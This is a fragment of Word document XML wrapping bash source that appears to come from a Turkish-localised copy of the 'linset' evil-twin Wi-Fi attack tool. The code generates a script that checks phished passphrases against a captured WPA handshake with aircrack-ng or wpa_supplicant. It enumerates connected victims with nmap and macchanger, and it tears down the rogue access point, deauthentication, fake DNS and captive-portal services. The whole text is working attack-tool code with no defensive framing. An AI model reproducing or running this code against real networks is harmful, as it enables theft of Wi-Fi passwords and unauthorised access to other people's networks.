    <w:p w14:paraId="34071092" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E138B7B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAAA61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ \"\$minutos\" -le 9 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C703A9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>im=\"0\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE43B9D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFF258" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>im=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890DAA3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38204953" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9D223" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ \"\$horas\" -le 9 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF7284" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ih=\"0\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708F7B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13DF13" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ih=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B61D390" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE184C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="78F70568" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $authmode = "handshake" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379752E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "if [ -f $DUMP_PATH/intento ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435445F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C79E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ! aircrack-ng -w $DUMP_PATH/data.txt $DUMP_PATH/$Host_MAC-01.cap | grep -qi \"Passphrase not in\"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD9212" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo \"2\"&gt;$DUMP_PATH/intento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC99FBE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0228BF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1F071" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo \"1\"&gt;$DUMP_PATH/intento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1FCB6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8ADE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F946451" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD93265" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F24A9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>elif [ $authmode = "wpa_supplicant" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE2451" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023DE63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>wpa_passphrase $Host_SSID \$(cat $DUMP_PATH/data.txt)&gt;$DUMP_PATH/wpa_supplicant.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B176730" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>wpa_supplicant -i$WIFI -c$DUMP_PATH/wpa_supplicant.conf -f $DUMP_PATH/loggg &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDE7394" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004D81E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ -f $DUMP_PATH/intento ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3F18F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6BBB0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if grep -i 'WPA: Key negotiation completed' $DUMP_PATH/loggg; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B2661" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo \"2\"&gt;$DUMP_PATH/intento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C301A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9E3F9E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB78FF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo \"1\"&gt;$DUMP_PATH/intento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135DBE5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C7C3B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16AEBD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A5131" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49980B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AD6A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8C943" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "readarray -t CLIENTESDHCP &lt; &lt;(nmap -sP -oG - $RANG_IP.100-110 2&gt;&amp;1 | grep Host )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7DE2F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478C61E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68554310" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"  ERİŞİM NOKTASI:\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAB8AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    İsim..........: "$beyaz"$Host_SSID"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B5BA1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    MAC.............: "$sari"$Host_MAC"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0746EB5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo -e \"    Kanal...........: "$beyaz"$Host_CHAN"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BFE0EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    Yapıcı......: "$yesil"$Host_MAC_MODEL"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A246F90" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    Aktif zaman...: "$gri"\$ih\$horas:\$im\$minutos:\$is\$segundos"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8B922" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    Denemeler........: "$kirmizi"\$(cat $DUMP_PATH/hit.txt)"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4334AD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"    Bağlananlar........: "$mavi"\$(cat $DUMP_PATH/clientes.txt | grep DHCPACK | sort| uniq | wc -l)"$yenidenrenklendir"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048BD45" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191D39D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e \"  AKTİF BAĞLANANLAR:\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226FF5D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C362D37" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>x=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05716C1A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>for cliente in \"\${CLIENTESDHCP[@]}\"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CE21B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  x=\$((\$x+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B1CA4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  CLIENTE_IP=\$(echo \$cliente| cut -d \" \" -f2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6C315" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  CLIENTE_MAC=\$(nmap -sP \$CLIENTE_IP 2&gt;&amp;1 | grep -i mac | cut -d \" \" -f3 | tr [:upper:] [:lower:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806A7B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425CDBF7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  if [ \"\$(echo \$CLIENTE_MAC| wc -m)\" != \"18\" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F6D51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CLIENTE_MAC=\"xx:xx:xx:xx:xx:xx\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1AD6A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126B86A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D8C8E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  CLIENTE_FABRICANTE=\$(macchanger -l | grep \"\$(echo \"\$CLIENTE_MAC\" | cut -d \":\" -f -3)\" | cut -d \" \" -f 5-)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C85F974" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFB720" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  if echo \$CLIENTE_MAC| grep -q x; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E11440" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    CLIENTE_FABRICANTE=\"unknown\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2BBFB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F827921" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DC4E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  CLIENTE_HOSTNAME=\$(echo \$cliente| cut -d \" \" -f 3 | cut -d \"(\" -f2 | cut -d \")\" -f1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D268FB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63CD6D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  echo -e \"    $yesil\$x) $kirmizi\$CLIENTE_IP $sari\$CLIENTE_MAC $yenidenrenklendir($mavi\$CLIENTE_FABRICANTE$yenidenrenklendir) $yesil\$CLIENTE_HOSTNAME$yenidenrenklendir\"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC8AB0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F175B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D4638" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne \"\033[K\033[u\""&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABBA54B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC0E4A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="121062D7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $authmode = "handshake" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC7DDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "let i=\$(date +%s)-\$timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09656420" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 1"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED521" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102FAA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>elif [ $authmode = "wpa_supplicant" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55A956" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "sleep 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E2095" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744D3E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall wpa_supplicant &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26818A8D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall wpa_passphrase &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD0A07" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>let i=\$i+5"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366A155" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23481E36" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBB96A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4C909" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04613A96" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo \"1\" &gt; $DUMP_PATH/status.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21113794" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DED40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD38AD6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8224BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">killall mdk3 &amp;&gt;$linset_output_device   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C816D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall aireplay-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B210813" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall airbase-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FB62A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>kill \$(ps a | grep python| grep fakedns | awk '{print \$1}') &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C4D70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall hostapd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647395FB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall lighttpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DA549" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall dhcpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
